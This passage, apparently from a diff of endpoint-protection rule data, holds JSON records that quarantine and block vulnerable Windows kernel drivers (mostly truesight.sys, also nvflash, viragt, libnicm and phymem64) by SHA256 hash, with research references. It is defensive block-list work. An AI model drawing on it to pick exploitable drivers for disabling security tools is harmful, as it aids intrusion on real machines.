"source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.497836Z", + "creation_date": "2026-03-23T11:45:31.497839Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.497845Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "a595e1034665a108a7a7cba263709401d82477aa68187fd6ef3927b4acc2cd07", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) 
[https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "10a94906-b49b-542c-b1fa-5dd4e042da16", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:32.142850Z", + "creation_date": "2026-03-23T11:45:32.142852Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:32.142857Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "f8c07b6e2066a5a22a92d9f521ecdeb8c68698c400e4b83e0501b9f340957c22", + "comment": "Vulnerable Filseclab Driver (aka fildds.sys, filnk.sys and filwfp.sys) [https://twitter.com/SophosXOps/status/1764933865574207677] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "10b1048a-092a-5594-9a4c-6cfcec02a266", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.476107Z", + "creation_date": "2026-03-23T11:45:30.476116Z", + "enabled": true, + 
"block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.476125Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "66a20fc2658c70facd420f5437a73fa07a5175998e569255cfb16c2f14c5e796", + "comment": "Vulnerable Kernel Driver (aka libnicm.sys) [https://www.loldrivers.io/drivers/2b949a0d-939f-456a-a34f-4589d7712227/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "10b3fc3b-bae4-5fec-912e-cdc37b554272", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.157456Z", + "creation_date": "2026-03-23T11:45:31.157458Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.157464Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "c18f564bcbee4723514580fd7741e1883ffbf2e37e9f5b2da5a79033305aaa13", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "10b86956-0b58-55aa-862f-a070e96542d0", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + 
"test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.809289Z", + "creation_date": "2026-03-23T11:45:31.809292Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.809301Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "e72867adaa4a79dd8d332b3d2e0bf705b76af7c5e8505167c23aa41bac7ce1bb", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "10db64ef-0c56-54f1-ad29-0ed1f3cfde0d", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.146058Z", + "creation_date": "2026-03-23T11:45:31.146060Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.146066Z", + "rule_level": null, + "rule_level_override": null, 
+ "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "f91769cd61784914bde779fe4cd7520d7e76523bafb9d06cc78d0346bbfaec14", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "10ddbeb4-ab0c-5847-bb45-ecda226931f3", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.480817Z", + "creation_date": "2026-03-23T11:45:31.480821Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.480828Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "ded1bffeb296f566935ea030bf2d02f7d530f01c7a0774383385a5dc3ebf2698", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "10e3b176-0cb0-5000-a3de-38d2bfd04722", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + 
"rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.477420Z", + "creation_date": "2026-03-23T11:45:31.477424Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.477433Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "c1a547472666006fc7a0439a37ccd7b5fce11818460ebcc42b57649e523433c1", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "10f1af51-06f9-5b96-9ab0-b6578fb9d5ea", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.618322Z", + "creation_date": "2026-03-23T11:45:29.618324Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.618329Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": 
"e2d6cdc3d8960a50d9f292bb337b3235956a61e4e8b16cf158cb979b777f42aa", + "comment": "NVIDIA vulnerable flash tool (aka nvflash.sys nd nvflsh64.sys) [CVE-2019-5688] [https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "10f449c9-caa2-5655-83b9-f7627e07ff04", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.972664Z", + "creation_date": "2026-03-23T11:45:29.972666Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.972671Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "54e969dc477af9a3e5b53dc4edaebc41a7b73c87ecca13dc1fbb8dfc86c0fd78", + "comment": "TG Soft vulnerable driver (aka viragt.sys and viragt64.sys) [https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "10f5c81d-f3e1-56d3-a12d-8948caf2974b", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + 
"source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.812945Z", + "creation_date": "2026-03-23T11:45:31.812955Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.812963Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "bd68e81f338b91c2381dcd1e37f4c4e5649acad687608d9dbc1fa8fe24c346b8", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "110574b3-e699-5994-b4ac-07b492b2a088", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.983193Z", + "creation_date": "2026-03-23T11:45:29.983195Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.983201Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "708016fbe22c813a251098f8f992b177b476bd1bbc48c2ed4a122ff74910a965", 
+ "comment": "Vulnerable Kernel Driver (aka b3.sys) [https://www.loldrivers.io/drivers/adfb015a-f453-4b9e-a247-50f146209eb0/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "110d6a55-ff1e-5067-bd87-3d6e9647f0b4", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.813777Z", + "creation_date": "2026-03-23T11:45:31.813781Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.813790Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "ef5103072db29437d68eb24998bdc7b15533d2fe8108929acb1dff805c91a7a0", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "11143612-92a8-507a-a673-9e78fb38ea0a", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": 
"2026-03-23T11:45:31.160322Z", + "creation_date": "2026-03-23T11:45:31.160324Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.160332Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "97cadcc0170ca3d521d2018628050caab2f27ef2f181180c74c2ab25277941ee", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "11145577-5d08-5c7d-a685-2862d84bc823", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.619194Z", + "creation_date": "2026-03-23T11:45:29.619196Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.619202Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "1963d5a0e512b72353953aadbe694f73a9a576f0241a988378fa40bf574eda52", + "comment": "Super Micro Computer physmem tool (aka phymem64.sys)", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "111af200-3ecc-5a57-9ad3-f4177ce37d4d", + "test_maturity_current_count": 0, + 
"test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.833838Z", + "creation_date": "2026-03-23T11:45:30.833841Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.833850Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "6236bddd0fa696e9364fac7f0fa5ae38e9c76adf6d6fc504f8f8aae6d7ae03f2", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "111fd345-cb8a-5920-b1fa-fa050c873e28", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.159330Z", + "creation_date": "2026-03-23T11:45:31.159332Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.159337Z", + "rule_level": null, + 
"rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "e4594fa9bf1a89b5542345f20ac7dac79fd1afa4cc6ff494fe9249973ec9d0c8", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "113a3840-45cf-539c-93a5-a5b4544cb9c8", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.498010Z", + "creation_date": "2026-03-23T11:45:31.498013Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.498021Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "84425276857168c194eba0c8cd74ff58ddf229bea91fb0392ae66a452c0e79e7", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "113caa7c-92cc-52a4-938c-11c59c12a02d", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": 
"critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.826764Z", + "creation_date": "2026-03-23T11:45:30.826767Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.826772Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "98d8b701a2a49ad621ea9ef4f4776ffab02570a4df4f9cc9f3ce14a307fe7939", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "116068d4-af1f-53c9-abe9-0c680455dca4", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.156638Z", + "creation_date": "2026-03-23T11:45:31.156639Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.156645Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": 
"76219892d1b31c3be29dc56b66a296de68da0019e636aaae64fce74401d0a924", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "11756f25-3436-56b1-81b3-e763ab782bc6", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.812472Z", + "creation_date": "2026-03-23T11:45:31.812474Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.812480Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "e5cbf39a275265519ae5f8260f031f9e5a3a2f1eae333742ed49f0cc61a5e60a", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "11793f33-ef97-518d-a6df-c8ccfc0c5f06", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + 
"last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.824042Z", + "creation_date": "2026-03-23T11:45:30.824045Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.824050Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "361afe55e0a6f5f911fe1b3445c56a5287b26ec735073d2e28e17b8bf8d4b4b9", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "11a14e3d-25ad-5e0c-b911-e369c24b4835", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.832694Z", + "creation_date": "2026-03-23T11:45:30.832696Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.832702Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "7be7b71c3bdbc7e4868e4b2ae6ae20adad8bef30a77b3387810243459dcaa548", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware 
Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "11a9a0e6-50af-540c-a316-94916c1b45cc", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.487396Z", + "creation_date": "2026-03-23T11:45:31.487398Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.487403Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "1c910fea59299110d2c171f5ea22966bd06108fdfda45f2e01f7f758ddefc7ce", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "11bd6a87-11c3-5c86-a2f6-d60e06b828f4", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": 
